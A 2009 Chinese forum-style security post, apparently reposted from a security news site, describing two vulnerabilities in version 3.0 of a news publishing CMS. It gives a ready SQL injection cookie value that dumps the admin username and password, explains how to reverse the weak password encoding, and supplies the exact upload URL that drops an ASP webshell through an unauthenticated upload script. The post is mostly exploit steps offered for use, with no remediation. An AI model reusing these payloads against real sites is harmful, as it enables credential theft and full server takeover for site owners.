雷驰显卡:雷驰新闻发布管理系统v3.0漏洞很简单来源: 发布时间:星期六, 2009年9月12日 浏览:26次 评论:0
来源:安全中国
第个就是得到管理员密码和用户名 在http://127.0.0.1/otype.asp?owen1=文体新闻 加上下面段COOKIES owen2=娱乐新闻' and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 1<2 and ''=' (注意要转换下)直接得到管理员用户名和密码 其密码简单加密了第位加1第 2位加2第5位加5 如果密码本来是aaaaa话那么加密出来就是bcdef 如果加密后密码是fffff话那么原来密码就是edcba 第 2个漏洞直接得到WEBSHELL 后门有个上传图片里面有段代码是这样 actionType = trim(Request.QueryString("actionType")) picName = trim(Request.QueryString("picName")) ………… actionType= "mod" then remFileName = Right(picName,len(picName)-InstrRev(picName,"/")) ………… end file.SaveAs Server.mappath(formPath&remFileName) 提交地址改成 /admin/uploadPic.inc.asp?upload_code=ok&editImageNum=1&actionType=mod&picName=123.asp&editRemNum=123123123 就可以直接上传个马了 第 2个漏洞问题很严重uploadPic.inc.asp这个文件竟然没有验证管理员是否登陆 意思就是说第步都可以省略了来搞汗~~~~ 我主要就是想介绍说明问题就是 这个漏洞太大了而且利用太简单了而已 0
相关文章读者评论发表评论 |